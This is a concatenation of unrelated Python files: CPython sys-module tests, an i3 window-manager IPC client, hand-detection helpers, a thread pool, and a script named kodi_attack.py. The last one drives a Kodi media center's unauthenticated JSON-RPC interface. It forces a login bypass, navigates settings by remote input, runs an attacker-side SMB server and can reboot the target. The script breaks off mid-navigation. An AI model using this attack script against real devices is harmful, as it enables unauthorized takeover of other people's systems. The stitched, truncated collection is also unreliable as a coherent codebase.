sys.implementation.name.lower())
@test.support.cpython_only
def test_debugmallocstats(self):
# Test sys._debugmallocstats()
from test.support.script_helper import assert_python_ok
args = ['-c', 'import sys; sys._debugmallocstats()']
ret, out, err = assert_python_ok(*args)
self.assertIn(b"free PyDictObjects", err)
# The function has no parameter
self.assertRaises(TypeError, sys._debugmallocstats, True)
@unittest.skipUnless(hasattr(sys, "getallocatedblocks"),
"sys.getallocatedblocks unavailable on this build")
def test_getallocatedblocks(self):
try:
import _testcapi
except ImportError:
with_pymalloc = support.with_pymalloc()
else:
try:
alloc_name = _testcapi.pymem_getallocatorsname()
except RuntimeError as exc:
# "cannot get allocators name" (ex: tracemalloc is used)
with_pymalloc = True
else:
with_pymalloc = (alloc_name in ('pymalloc', 'pymalloc_debug'))
# Some sanity checks
a = sys.getallocatedblocks()
self.assertIs(type(a), int)
if with_pymalloc:
self.assertGreater(a, 0)
else:
# When WITH_PYMALLOC isn't available, we don't know anything
# about the underlying implementation: the function might
# return 0 or something greater.
self.assertGreaterEqual(a, 0)
try:
# While we could imagine a Python session where the number of
# multiple buffer objects would exceed the sharing of references,
# it is unlikely to happen in a normal test run.
self.assertLess(a, sys.gettotalrefcount())
except AttributeError:
# gettotalrefcount() not available
pass
gc.collect()
b = sys.getallocatedblocks()
self.assertLessEqual(b, a)
gc.collect()
c = sys.getallocatedblocks()
self.assertIn(c, range(b - 50, b + 50))
def test_is_finalizing(self):
self.assertIs(sys.is_finalizing(), False)
# Don't use the atexit module because _Py_Finalizing is only set
# after calling atexit callbacks
code = """if 1:
import sys
class AtExit:
is_finalizing = sys.is_finalizing
print = print
def __del__(self):
self.print(self.is_finalizing(), flush=True)
# Keep a reference in the __main__ module namespace, so the
# AtExit destructor will be called at Python exit
ref = AtExit()
"""
rc, stdout, stderr = assert_python_ok('-c', code)
self.assertEqual(stdout.rstrip(), b'True')
def test_issue20602(self):
# sys.flags and sys.float_info were wiped during shutdown.
code = """if 1:
import sys
class A:
def __del__(self, sys=sys):
print(sys.flags)
print(sys.float_info)
a = A()
"""
rc, out, err = assert_python_ok('-c', code)
out = out.splitlines()
self.assertIn(b'sys.flags', out[0])
self.assertIn(b'sys.float_info', out[1])
def test_sys_ignores_cleaning_up_user_data(self):
code = """if 1:
import struct, sys
class C:
def __init__(self):
self.pack = struct.pack
def __del__(self):
self.pack('I', -42)
sys.x = C()
"""
rc, stdout, stderr = assert_python_ok('-c', code)
self.assertEqual(rc, 0)
self.assertEqual(stdout.rstrip(), b"")
self.assertEqual(stderr.rstrip(), b"")
@unittest.skipUnless(hasattr(sys, 'getandroidapilevel'),
'need sys.getandroidapilevel()')
def test_getandroidapilevel(self):
level = sys.getandroidapilevel()
self.assertIsInstance(level, int)
self.assertGreater(level, 0)
def test_sys_tracebacklimit(self):
code = """if 1:
import sys
def f1():
1 / 0
def f2():
f1()
sys.tracebacklimit = %r
f2()
"""
def check(tracebacklimit, expected):
p = subprocess.Popen([sys.executable, '-c', code % tracebacklimit],
stderr=subprocess.PIPE)
out = p.communicate()[1]
self.assertEqual(out.splitlines(), expected)
traceback = [
b'Traceback (most recent call last):',
b' File "<string>", line 8, in <module>',
b' File "<string>", line 6, in f2',
b' File "<string>", line 4, in f1',
b'ZeroDivisionError: division by zero'
]
check(10, traceback)
check(3, traceback)
check(2, traceback[:1] + traceback[2:])
check(1, traceback[:1] + traceback[3:])
check(0, [traceback[-1]])
check(-1, [traceback[-1]])
check(1<<1000, traceback)
check(-1<<1000, [traceback[-1]])
check(None, traceback)
def test_no_duplicates_in_meta_path(self):
self.assertEqual(len(sys.meta_path), len(set(sys.meta_path)))
@unittest.skipUnless(hasattr(sys, "_enablelegacywindowsfsencoding"),
'needs sys._enablelegacywindowsfsencoding()')
def test__enablelegacywindowsfsencoding(self):
code = ('import sys',
'sys._enablelegacywindowsfsencoding()',
'print(sys.getfilesystemencoding(), sys.getfilesystemencodeerrors())')
rc, out, err = assert_python_ok('-c', '; '.join(code))
out = out.decode('ascii', 'replace').rstrip()
self.assertEqual(out, 'mbcs replace')
def test_orig_argv(self):
code = textwrap.dedent('''
import sys
print(sys.argv)
print(sys.orig_argv)
''')
args = [sys.executable, '-I', '-X', 'utf8', '-c', code, 'arg']
proc = subprocess.run(args, check=True, capture_output=True, text=True)
expected = [
repr(['-c', 'arg']), # sys.argv
repr(args), # sys.orig_argv
]
self.assertEqual(proc.stdout.rstrip().splitlines(), expected,
proc)
def test_module_names(self):
self.assertIsInstance(sys.stdlib_module_names, frozenset)
for name in sys.stdlib_module_names:
self.assertIsInstance(name, str)
def test_stdlib_dir(self):
os = import_helper.import_fresh_module('os')
marker = getattr(os, '__file__', None)
if marker and not os.path.exists(marker):
marker = None
expected = os.path.dirname(marker) if marker else None
actual = sys._stdlib_dir
self.assertEqual(actual, expected)
@test.support.cpython_only
class UnraisableHookTest(unittest.TestCase):
def write_unraisable_exc(self, exc, err_msg, obj):
import _testcapi
import types
err_msg2 = f"Exception ignored {err_msg}"
try:
_testcapi.write_unraisable_exc(exc, err_msg, obj)
return types.SimpleNamespace(exc_type=type(exc),
exc_value=exc,
exc_traceback=exc.__traceback__,
err_msg=err_msg2,
object=obj)
finally:
# Explicitly break any reference cycle
exc = None
def test_original_unraisablehook(self):
for err_msg in (None, "original hook"):
with self.subTest(err_msg=err_msg):
obj = "an object"
with test.support.captured_output("stderr") as stderr:
with test.support.swap_attr(sys, 'unraisablehook',
sys.__unraisablehook__):
self.write_unraisable_exc(ValueError(42), err_msg, obj)
err = stderr.getvalue()
if err_msg is not None:
self.assertIn(f'Exception ignored {err_msg}: {obj!r}\n', err)
else:
self.assertIn(f'Exception ignored in: {obj!r}\n', err)
self.assertIn('Traceback (most recent call last):\n', err)
self.assertIn('ValueError: 42\n', err)
def test_original_unraisablehook_err(self):
# bpo-22836: PyErr_WriteUnraisable() should give sensible reports
class BrokenDel:
def __del__(self):
exc = ValueError("del is broken")
# The following line is included in the traceback report:
raise exc
class BrokenStrException(Exception):
def __str__(self):
raise Exception("str() is broken")
class BrokenExceptionDel:
def __del__(self):
exc = BrokenStrException()
# The following line is included in the traceback report:
raise exc
for test_class in (BrokenDel, BrokenExceptionDel):
with self.subTest(test_class):
obj = test_class()
with test.support.captured_stderr() as stderr, \
test.support.swap_attr(sys, 'unraisablehook',
sys.__unraisablehook__):
# Trigger obj.__del__()
del obj
report = stderr.getvalue()
self.assertIn("Exception ignored", report)
self.assertIn(test_class.__del__.__qualname__, report)
self.assertIn("test_sys.py", report)
self.assertIn("raise exc", report)
if test_class is BrokenExceptionDel:
self.assertIn("BrokenStrException", report)
self.assertIn("<exception str() failed>", report)
else:
self.assertIn("ValueError", report)
self.assertIn("del is broken", report)
self.assertTrue(report.endswith("\n"))
def test_original_unraisablehook_exception_qualname(self):
# See bpo-41031, bpo-45083.
# Check that the exception is printed with its qualified name
# rather than just classname, and the module names appears
# unless it is one of the hard-coded exclusions.
class A:
class B:
class X(Exception):
pass
for moduleName in 'builtins', '__main__', 'some_module':
with self.subTest(moduleName=moduleName):
A.B.X.__module__ = moduleName
with test.support.captured_stderr() as stderr, \
test.support.swap_attr(sys, 'unraisablehook',
sys.__unraisablehook__):
expected = self.write_unraisable_exc(
A.B.X(), "msg", "obj");
report = stderr.getvalue()
self.assertIn(A.B.X.__qualname__, report)
if moduleName in ['builtins', '__main__']:
self.assertNotIn(moduleName + '.', report)
else:
self.assertIn(moduleName + '.', report)
def test_original_unraisablehook_wrong_type(self):
exc = ValueError(42)
with test.support.swap_attr(sys, 'unraisablehook',
sys.__unraisablehook__):
with self.assertRaises(TypeError):
sys.unraisablehook(exc)
def test_custom_unraisablehook(self):
hook_args = None
def hook_func(args):
nonlocal hook_args
hook_args = args
obj = object()
try:
with test.support.swap_attr(sys, 'unraisablehook', hook_func):
expected = self.write_unraisable_exc(ValueError(42),
"custom hook", obj)
for attr in "exc_type exc_value exc_traceback err_msg object".split():
self.assertEqual(getattr(hook_args, attr),
getattr(expected, attr),
(hook_args, expected))
finally:
# expected and hook_args contain an exception: break reference cycle
expected = None
hook_args = None
def test_custom_unraisablehook_fail(self):
def hook_func(*args):
raise Exception("hook_func failed")
with test.support.captured_output("stderr") as stderr:
with test.support.swap_attr(sys, 'unraisablehook', hook_func):
self.write_unraisable_exc(ValueError(42),
"custom hook fail", None)
err = stderr.getvalue()
self.assertIn(f'Exception ignored in sys.unraisablehook: '
f'{hook_func!r}\n',
err)
self.assertIn('Traceback (most recent call last):\n', err)
self.assertIn('Exception: hook_func failed\n', err)
@test.support.cpython_only
class SizeofTest(unittest.TestCase):
def setUp(self):
self.P = struct.calcsize('P')
self.longdigit = sys.int_info.sizeof_digit
import _testinternalcapi
self.gc_headsize = _testinternalcapi.SIZEOF_PYGC_HEAD
check_sizeof = test.support.check_sizeof
def test_gc_head_size(self):
# Check that the gc header size is added to objects tracked by the gc.
vsize = test.support.calcvobjsize
gc_header_size = self.gc_headsize
# bool objects are not gc tracked
self.assertEqual(sys.getsizeof(True), vsize('') + self.longdigit)
# but lists are
self.assertEqual(sys.getsizeof([]), vsize('Pn') + gc_header_size)
def test_errors(self):
class BadSizeof:
def __sizeof__(self):
raise ValueError
self.assertRaises(ValueError, sys.getsizeof, BadSizeof())
class InvalidSizeof:
def __sizeof__(self):
return None
self.assertRaises(TypeError, sys.getsizeof, InvalidSizeof())
sentinel = ["sentinel"]
self.assertIs(sys.getsizeof(InvalidSizeof(), sentinel), sentinel)
class FloatSizeof:
def __sizeof__(self):
return 4.5
self.assertRaises(TypeError, sys.getsizeof, FloatSizeof())
self.assertIs(sys.getsizeof(FloatSizeof(), sentinel), sentinel)
class OverflowSizeof(int):
def __sizeof__(self):
return int(self)
self.assertEqual(sys.getsizeof(OverflowSizeof(sys.maxsize)),
sys.maxsize + self.gc_headsize)
with self.assertRaises(OverflowError):
sys.getsizeof(OverflowSizeof(sys.maxsize + 1))
with self.assertRaises(ValueError):
sys.getsizeof(OverflowSizeof(-1))
with self.assertRaises((ValueError, OverflowError)):
sys.getsizeof(OverflowSizeof(-sys.maxsize - 1))
def test_default(self):
size = test.support.calcvobjsize
self.assertEqual(sys.getsizeof(True), size('') + self.longdigit)
self.assertEqual(sys.getsizeof(True, -1), size('') + self.longdigit)
def test_objecttypes(self):
# check all types defined in Objects/
calcsize = struct.calcsize
size = test.support.calcobjsize
vsize = test.support.calcvobjsize
check = self.check_sizeof
# bool
check(True, vsize('') + self.longdigit)
# buffer
# XXX
# builtin_function_or_method
check(len, size('5P'))
# bytearray
samples = [b'', b'u'*100000]
for sample in samples:
x = bytearray(sample)
check(x, vsize('n2Pi') + x.__alloc__())
# bytearray_iterator
check(iter(bytearray()), size('nP'))
# bytes
check(b'', vsize('n') + 1)
check(b'x' * 10, vsize('n') + 11)
# cell
def get_cell():
x = 42
def inner():
return x
return inner
check(get_cell().__closure__[0], size('P'))
# code
def check_code_size(a, expected_size):
self.assertGreaterEqual(sys.getsizeof(a), expected_size)
check_code_size(get_cell().__code__, size('6i13P'))
check_code_size(get_cell.__code__, size('6i13P'))
def get_cell2(x):
def inner():
return x
return inner
check_code_size(get_cell2.__code__, size('6i13P') + calcsize('n'))
# complex
check(complex(0,1), size('2d'))
# method_descriptor (descriptor object)
check(str.lower, size('3PPP'))
# classmethod_descriptor (descriptor object)
# XXX
# member_descriptor (descriptor object)
import datetime
check(datetime.timedelta.days, size('3PP'))
# getset_descriptor (descriptor object)
import collections
check(collections.defaultdict.default_factory, size('3PP'))
# wrapper_descriptor (descriptor object)
check(int.__add__, size('3P2P'))
# method-wrapper (descriptor object)
check({}.__iter__, size('2P'))
# empty dict
check({}, size('nQ2P'))
# dict
check({"a": 1}, size('nQ2P') + calcsize(DICT_KEY_STRUCT_FORMAT) + 8 + (8*2//3)*calcsize('n2P'))
longdict = {1:1, 2:2, 3:3, 4:4, 5:5, 6:6, 7:7, 8:8}
check(longdict, size('nQ2P') + calcsize(DICT_KEY_STRUCT_FORMAT) + 16 + (16*2//3)*calcsize('n2P'))
# dictionary-keyview
check({}.keys(), size('P'))
# dictionary-valueview
check({}.values(), size('P'))
# dictionary-itemview
check({}.items(), size('P'))
# dictionary iterator
check(iter({}), size('P2nPn'))
# dictionary-keyiterator
check(iter({}.keys()), size('P2nPn'))
# dictionary-valueiterator
check(iter({}.values()), size('P2nPn'))
# dictionary-itemiterator
check(iter({}.items()), size('P2nPn'))
# dictproxy
class C(object): pass
check(C.__dict__, size('P'))
# BaseException
check(BaseException(), size('5Pb'))
# UnicodeEncodeError
check(UnicodeEncodeError("", "", 0, 0, ""), size('5Pb 2P2nP'))
# UnicodeDecodeError
check(UnicodeDecodeError("", b"", 0, 0, ""), size('5Pb 2P2nP'))
# UnicodeTranslateError
check(UnicodeTranslateError("", 0, 1, ""), size('5Pb 2P2nP'))
# ellipses
check(Ellipsis, size(''))
# EncodingMap
import codecs, encodings.iso8859_3
x = codecs.charmap_build(encodings.iso8859_3.decoding_table)
check(x, size('32B2iB'))
# enumerate
check(enumerate([]), size('n3P'))
# reverse
check(reversed(''), size('nP'))
# float
check(float(0), size('d'))
# sys.floatinfo
check(sys.float_info, vsize('') + self.P * len(sys.float_info))
# frame
import inspect
x = inspect.currentframe()
check(x, size('3Pi3c'))
# function
def func(): pass
check(func, size('14Pi'))
class c():
@staticmethod
def foo():
pass
@classmethod
def bar(cls):
pass
# staticmethod
check(foo, size('PP'))
# classmethod
check(bar, size('PP'))
# generator
def get_gen(): yield 1
check(get_gen(), size('P2PPP4P'))
# iterator
check(iter('abc'), size('lP'))
# callable-iterator
import re
check(re.finditer('',''), size('2P'))
# list
samples = [[], [1,2,3], ['1', '2', '3']]
for sample in samples:
check(list(sample), vsize('Pn') + len(sample)*self.P)
# sortwrapper (list)
# XXX
# cmpwrapper (list)
# XXX
# listiterator (list)
check(iter([]), size('lP'))
# listreverseiterator (list)
check(reversed([]), size('nP'))
# int
check(0, vsize(''))
check(1, vsize('') + self.longdigit)
check(-1, vsize('') + self.longdigit)
PyLong_BASE = 2**sys.int_info.bits_per_digit
check(int(PyLong_BASE), vsize('') + 2*self.longdigit)
check(int(PyLong_BASE**2-1), vsize('') + 2*self.longdigit)
check(int(PyLong_BASE**2), vsize('') + 3*self.longdigit)
# module
check(unittest, size('PnPPP'))
# None
check(None, size(''))
# NotImplementedType
check(NotImplemented, size(''))
# object
check(object(), size(''))
# property (descriptor object)
class C(object):
def getx(self): return self.__x
def setx(self, value): self.__x = value
def delx(self): del self.__x
x = property(getx, setx, delx, "")
check(x, size('5Pi'))
# PyCapsule
# XXX
# rangeiterator
check(iter(range(1)), size('4l'))
# reverse
check(reversed(''), size('nP'))
# range
check(range(1), size('4P'))
check(range(66000), size('4P'))
# set
# frozenset
PySet_MINSIZE = 8
samples = [[], range(10), range(50)]
s = size('3nP' + PySet_MINSIZE*'nP' + '2nP')
for sample in samples:
minused = len(sample)
if minused == 0: tmp = 1
# the computation of minused is actually a bit more complicated
# but this suffices for the sizeof test
minused = minused*2
newsize = PySet_MINSIZE
while newsize <= minused:
newsize = newsize << 1
if newsize <= 8:
check(set(sample), s)
check(frozenset(sample), s)
else:
check(set(sample), s + newsize*calcsize('nP'))
check(frozenset(sample), s + newsize*calcsize('nP'))
# setiterator
check(iter(set()), size('P3n'))
# slice
check(slice(0), size('3P'))
# super
check(super(int), size('3P'))
# tuple
check((), vsize(''))
check((1,2,3), vsize('') + 3*self.P)
# type
# static type: PyTypeObject
fmt = 'P2nPI13Pl4Pn9Pn11PIPP'
s = vsize(fmt)
check(int, s)
# class
s = vsize(fmt + # PyTypeObject
'4P' # PyAsyncMethods
'36P' # PyNumberMethods
'3P' # PyMappingMethods
'10P' # PySequenceMethods
'2P' # PyBufferProcs
'5P')
class newstyleclass(object): pass
# Separate block for PyDictKeysObject with 8 keys and 5 entries
check(newstyleclass, s + calcsize(DICT_KEY_STRUCT_FORMAT) + 8 + 5*calcsize("n2P"))
# dict with shared keys
check(newstyleclass().__dict__, size('nQ2P') + 5*self.P)
o = newstyleclass()
o.a = o.b = o.c = o.d = o.e = o.f = o.g = o.h = 1
# Separate block for PyDictKeysObject with 16 keys and 10 entries
check(newstyleclass, s + calcsize(DICT_KEY_STRUCT_FORMAT) + 16 + 10*calcsize("n2P"))
# dict with shared keys
check(newstyleclass().__dict__, size('nQ2P') + 10*self.P)
# unicode
# each tuple contains a string and its expected character size
# don't put any static strings here, as they may contain
# wchar_t or UTF-8 representations
samples = ['1'*100, '\xff'*50,
'\u0100'*40, '\uffff'*100,
'\U00010000'*30, '\U0010ffff'*100]
asciifields = "nnbP"
compactfields = asciifields + "nPn"
unicodefields = compactfields + "P"
for s in samples:
maxchar = ord(max(s))
if maxchar < 128:
L = size(asciifields) + len(s) + 1
elif maxchar < 256:
L = size(compactfields) + len(s) + 1
elif maxchar < 65536:
L = size(compactfields) + 2*(len(s) + 1)
else:
L = size(compactfields) + 4*(len(s) + 1)
check(s, L)
# verify that the UTF-8 size is accounted for
s = chr(0x4000) # 4 bytes canonical representation
check(s, size(compactfields) + 4)
# compile() will trigger the generation of the UTF-8
# representation as a side effect
compile(s, "<stdin>", "eval")
check(s, size(compactfields) + 4 + 4)
# TODO: add check that forces the presence of wchar_t representation
# TODO: add check that forces layout of unicodefields
# weakref
import weakref
check(weakref.ref(int), size('2Pn2P'))
# weakproxy
# XXX
# weakcallableproxy
check(weakref.proxy(int), size('2Pn2P'))
def check_slots(self, obj, base, extra):
expected = sys.getsizeof(base) + struct.calcsize(extra)
if gc.is_tracked(obj) and not gc.is_tracked(base):
expected += self.gc_headsize
self.assertEqual(sys.getsizeof(obj), expected)
def test_slots(self):
# check all subclassable types defined in Objects/ that allow
# non-empty __slots__
check = self.check_slots
class BA(bytearray):
__slots__ = 'a', 'b', 'c'
check(BA(), bytearray(), '3P')
class D(dict):
__slots__ = 'a', 'b', 'c'
check(D(x=[]), {'x': []}, '3P')
class L(list):
__slots__ = 'a', 'b', 'c'
check(L(), [], '3P')
class S(set):
__slots__ = 'a', 'b', 'c'
check(S(), set(), '3P')
class FS(frozenset):
__slots__ = 'a', 'b', 'c'
check(FS(), frozenset(), '3P')
from collections import OrderedDict
class OD(OrderedDict):
__slots__ = 'a', 'b', 'c'
check(OD(x=[]), OrderedDict(x=[]), '3P')
def test_pythontypes(self):
# check all types defined in Python/
size = test.support.calcobjsize
vsize = test.support.calcvobjsize
check = self.check_sizeof
# _ast.AST
import _ast
check(_ast.AST(), size('P'))
try:
raise TypeError
except TypeError:
tb = sys.exc_info()[2]
# traceback
if tb is not None:
check(tb, size('2P2i'))
# symtable entry
# XXX
# sys.flags
check(sys.flags, vsize('') + self.P * len(sys.flags))
def test_asyncgen_hooks(self):
old = sys.get_asyncgen_hooks()
self.assertIsNone(old.firstiter)
self.assertIsNone(old.finalizer)
firstiter = lambda *a: None
sys.set_asyncgen_hooks(firstiter=firstiter)
hooks = sys.get_asyncgen_hooks()
self.assertIs(hooks.firstiter, firstiter)
self.assertIs(hooks[0], firstiter)
self.assertIs(hooks.finalizer, None)
self.assertIs(hooks[1], None)
finalizer = lambda *a: None
sys.set_asyncgen_hooks(finalizer=finalizer)
hooks = sys.get_asyncgen_hooks()
self.assertIs(hooks.firstiter, firstiter)
self.assertIs(hooks[0], firstiter)
self.assertIs(hooks.finalizer, finalizer)
self.assertIs(hooks[1], finalizer)
sys.set_asyncgen_hooks(*old)
cur = sys.get_asyncgen_hooks()
self.assertIsNone(cur.firstiter)
self.assertIsNone(cur.finalizer)
def test_changing_sys_stderr_and_removing_reference(self):
# If the default displayhook doesn't take a strong reference
# to sys.stderr the following code can crash. See bpo-43660
# for more details.
code = textwrap.dedent('''
import sys
class MyStderr:
def write(self, s):
sys.stderr = None
sys.stderr = MyStderr()
1/0
''')
rc, out, err = assert_python_failure('-c', code)
self.assertEqual(out, b"")
self.assertEqual(err, b"")
if __name__ == "__main__":
unittest.main()
|
i3msg.py
|
#!/usr/bin/env python
#https://github.com/Ceryn/i3msg-python
import socket, subprocess, struct, json, threading
MSGS = ['RUN_COMMAND', 'GET_WORKSPACES', 'SUBSCRIBE', 'GET_OUTPUTS', 'GET_TREE', 'GET_MARKS', 'GET_BAR_CONFIG', 'GET_VERSION', 'GET_BINDING_MODES', 'GET_CONFIG']
EVENTS = ['workspace', 'output', 'mode', 'window', 'barconfig_update', 'binding', 'shutdown']
for i, v in enumerate(MSGS):
vars()[v] = i
for i, v in enumerate(EVENTS):
vars()[v] = i
i3sockpath = None
def get_i3sockpath():
global i3sockpath
if i3sockpath is None:
i3sockpath = subprocess.check_output(['i3', '--get-socketpath']).strip()
return i3sockpath
def encode(n, msg=''):
return b"".join([str.encode('i3-ipc'),
struct.pack('I', len(msg)),
struct.pack('I', n),
str.encode(msg)])
def decode(blob):
size = int(struct.unpack('I', blob[ 6:10])[0])
type = int(struct.unpack('I', blob[10:14])[0]) & 0x7fffffff
return size, type, blob[14:]
def recvall(s):
size, event, data = decode(s.recv(14))
while len(data) < size:
data += s.recv(size - len(data))
return event, data
def send(n, msg=''):
s = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
s.connect(get_i3sockpath())
s.send(encode(n, str(msg)))
_, data = recvall(s)
s.close()
return json.loads(data)
def handle_subscription(s, handler):
while True:
event, data = recvall(s)
handler(event, json.loads(data))
def subscribe(events, handler):
s = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
s.connect(get_i3sockpath())
s.send(encode(SUBSCRIBE, json.dumps(events)))
_, data = recvall(s)
data = json.loads(data)
if not data.has_key('success') or data['success'] != True:
raise Exception('Subscription failed, got data: %s' % data)
t = threading.Thread(target=handle_subscription, args=(s, handler))
t.daemon = True
t.start()
|
test_mt_utils.py
|
# Utilities for object detector.
import numpy as np
import sys
import tensorflow as tf
import os
from threading import Thread
from datetime import datetime
import cv2
detection_graph = tf.Graph()
sys.path.append("..")
# score threshold for showing bounding boxes.
_score_thresh = 0.27
MODEL_NAME = 'hand_inference_graph'
# Path to frozen detection graph. This is the actual model that is used for the object detection.
PATH_TO_CKPT = MODEL_NAME + '/frozen_inference_graph.pb'
# List of the strings that is used to add correct label for each box.
PATH_TO_LABELS = os.path.join(MODEL_NAME, 'hand_label_map.pbtxt')
NUM_CLASSES = 1
# Load a frozen infrerence graph into memory
def load_inference_graph():
# load frozen tensorflow model into memory
print("> ====== loading HAND frozen graph into memory")
detection_graph = tf.Graph()
with detection_graph.as_default():
od_graph_def = tf.GraphDef()
with tf.gfile.GFile(PATH_TO_CKPT, 'rb') as fid:
serialized_graph = fid.read()
od_graph_def.ParseFromString(serialized_graph)
tf.import_graph_def(od_graph_def, name='')
sess = tf.Session(graph=detection_graph)
print("> ====== Hand Inference graph loaded.")
return detection_graph, sess
# draw the detected bounding boxes on the images
# You can modify this to also draw a label.
def draw_box_on_image(num_hands_detect, score_thresh, scores, boxes, im_width, im_height, image_np):
for i in range(num_hands_detect):
if (scores[i] > score_thresh):
(left, right, top, bottom) = (boxes[i][1] * im_width, boxes[i][3] * im_width,
boxes[i][0] * im_height, boxes[i][2] * im_height)
p1 = (int(left), int(top))
p2 = (int(right), int(bottom))
cv2.rectangle(image_np, p1, p2, (77, 255, 9), 3, 1)
# Actual detection .. generate scores and bounding boxes given an image
def detect_objects(image_np, detection_graph, sess):
# Definite input and output Tensors for detection_graph
image_tensor = detection_graph.get_tensor_by_name('image_tensor:0')
# Each box represents a part of the image where a particular object was detected.
detection_boxes = detection_graph.get_tensor_by_name(
'detection_boxes:0')
# Each score represent how level of confidence for each of the objects.
# Score is shown on the result image, together with the class label.
detection_scores = detection_graph.get_tensor_by_name(
'detection_scores:0')
detection_classes = detection_graph.get_tensor_by_name(
'detection_classes:0')
num_detections = detection_graph.get_tensor_by_name(
'num_detections:0')
image_np_expanded = np.expand_dims(image_np, axis=0)
(boxes, scores, classes, num) = sess.run(
[detection_boxes, detection_scores,
detection_classes, num_detections],
feed_dict={image_tensor: image_np_expanded})
return np.squeeze(boxes), np.squeeze(scores)
# Code to thread reading camera input.
# Source : Adrian Rosebrock
# https://www.pyimagesearch.com/2017/02/06/faster-video-file-fps-with-cv2-videocapture-and-opencv/
class WebcamVideoStream:
def __init__(self, src, width, height):
# initialize the video camera stream and read the first frame
# from the stream
self.stream = cv2.VideoCapture(src)
self.stream.set(cv2.CAP_PROP_FRAME_WIDTH, width)
self.stream.set(cv2.CAP_PROP_FRAME_HEIGHT, height)
(self.grabbed, self.frame) = self.stream.read()
# initialize the variable used to indicate if the thread should
# be stopped
self.stopped = False
def start(self):
# start the thread to read frames from the video stream
Thread(target=self.update, args=()).start()
return self
def update(self):
# keep looping infinitely until the thread is stopped
while True:
# if the thread indicator variable is set, stop the thread
if self.stopped:
return
# otherwise, read the next frame from the stream
(self.grabbed, self.frame) = self.stream.read()
def read(self):
# return the frame most recently read
return self.frame
def size(self):
# return size of the capture device
return self.stream.get(3), self.stream.get(4)
def stop(self):
# indicate that the thread should be stopped
self.stopped = True
|
ThreadPool.py
|
#!/usr/bin/env python
# -*- coding:utf-8 -*-
import queue
import threading
import contextlib
import time
StopEvent = object()
class ThreadPool(object):
def __init__(self, max_num):
self.q = queue.Queue()#存放任务的队列
self.max_num = max_num#最大线程并发数
self.terminal = False#如果为True 终止所有线程,不再获取新任务
self.generate_list = [] #已经创建的线程
self.free_list = []#闲置的线程
def run(self, func, args, callback=None):
"""
线程池执行一个任务
:param func: 任务函数
:param args: 任务函数所需参数
:param callback: 任务执行失败或成功后执行的回调函数,回调函数有两个参数1、任务函数执行状态;2、任务函数返回值(默认为None,即:不执行回调函数)
:return: 如果线程池已经终止,则返回True否则None
"""
if len(self.free_list) == 0 and len(self.generate_list) < self.max_num: #无空闲线程和不超过最大线程数
self.generate_thread() # 创建线程
w = (func, args, callback,)# 保存参数为元组
self.q.put(w)# 添加到任务队列
def generate_thread(self):
"""
创建一个线程
"""
t = threading.Thread(target=self.call)
t.start()
def call(self):
"""
循环去获取任务函数并执行任务函数
"""
current_thread = threading.currentThread#获取当前线程对象
self.generate_list.append(current_thread)#添加到已创建线程里
event = self.q.get() #获取任务
while event != StopEvent: #如果不为停止信号
func, arguments, callback = event#分别取值,
try:
result = func(*arguments) #运行函数,把结果赋值给result
status = True #运行结果是否正常
except Exception as e:
status = False #不正常
result = e #结果为错误信息
# print(e)
if callback is not None: # 是否有回调函数
try:
callback(status, result) #执行回调函数
except Exception as e:
pass
if self.terminal: # 默认为False ,如果调用terminal方法
event = StopEvent #停止信号
else:
# self.free_list.append(current_thread) #执行完毕任务,添加到闲置列表
# event = self.q.get() #获取任务
# self.free_list.remove(current_thread) #获取到任务之后,从闲置里删除
with self.worker_state(self.free_list,current_thread):
event = self.q.get()
else:
self.generate_list.remove(current_thread) #如果收到终止信号,就从已创建的列表删除
def close(self): #终止线程
num = len(self.generate_list) #获取总已创建的线程
while num:
self.q.put(StopEvent) #添加停止信号,有几个线程就添加几个
num -= 1
# 终止线程(清空队列)
def terminate(self):
self.terminal = True #更改为True,
while self.generate_list: #如果有已创建线程存活
self.q.put(StopEvent) #有几个就发几个信号
self.q.empty() #清空队列
@contextlib.contextmanager
def worker_state(self,free_list,current_thread):
free_list.append(current_thread)
try:
yield
finally:
free_list.remove(current_thread)
|
kodi_attack.py
|
import requests
import argparse
import threading
import socket
from struct import *
import time
import sys
from impacket import smbserver
def do_input_request(ip, port, method):
url = 'http://' + ip + ':' + port + '/jsonrpc'
data = '[{"jsonrpc":"2.0","method":"' + method + '","params":[],"id":13}]'
resp = requests.post(url, data = data)
return resp.status_code == 200
def do_send_text(ip, port, text):
url = 'http://' + ip + ':' + port + '/jsonrpc'
data = '[{"jsonrpc":"2.0","method":"Input.SendText","params":{"text":"' + text + '"},"id":13}]'
resp = requests.post(url, data = data)
return resp.status_code == 200
def do_action_request(ip, port, method):
url = 'http://' + ip + ':' + port + '/jsonrpc'
data = '[{"jsonrpc":"2.0","method":"Input.ExecuteAction","params":{"action":"' + method + '"},"id":13}]'
resp = requests.post(url, data = data)
return resp.status_code == 200
##
# The SMB Server function. Runs on its own thread.
# @param lip the listening IP address
##
def smb_server(lip):
server = smbserver.SimpleSMBServer(listenAddress=lip, listenPort=445)
server.addShare('00000000', '.', '')
server.setSMBChallenge('')
server.setLogFile('/dev/null')
server.start()
if __name__ == '__main__':
top_parser = argparse.ArgumentParser(description='test')
top_parser.add_argument('--rip', action="store", dest="rip", required=True, help="The IPv4 address to connect to")
top_parser.add_argument('--rport', action="store", dest="rport", help="The port to connect to", default="8080")
top_parser.add_argument('--lip', action="store", dest="lip", required=True, help="The local IPv4 address")
top_parser.add_argument('--reboot', action="store", dest="reboot", help="Reboot the remote target")
top_parser.add_argument('--clean', action="store", dest="clean", help="Attempt to clean up the environment")
args = top_parser.parse_args()
if args.reboot != None:
print("[+] Sending reboot request.")
url = 'http://' + args.rip + ':' + args.rport + '/jsonrpc'
data = '[{"jsonrpc":"2.0","method":"System.Reboot","params":[],"id":13}]'
resp = requests.post(url, data = data)
print("[+] Done.")
sys.exit(0)
# spin up the SMB server thread
print "[+] Spinning up the SMB Server"
smb_thread = threading.Thread(target=smb_server, args=(args.lip, ))
smb_thread.daemon = True;
smb_thread.start()
# Force return to the main page (aka login bypass)
do_input_request(args.rip, args.rport, "Input.Home")
# We're at the home screen but could have any menu item selected. Page up to reach the first item (TV shows)
do_action_request(args.rip, args.rport, "pageup")
do_action_request(args.rip, args.rport, "pageup")
# Go up one (power) and right one (settings) and hit enter
do_input_request(args.rip, args.rport, "Input.Up")
do_input_request(args.rip, args.rport, "Input.Right")
do_input_request(args.rip, args.rport, "Input.Select")
# We're in the settings page. We could be anywhere though. Page up (Player || File Manager) and then up (File manger). Hit enter
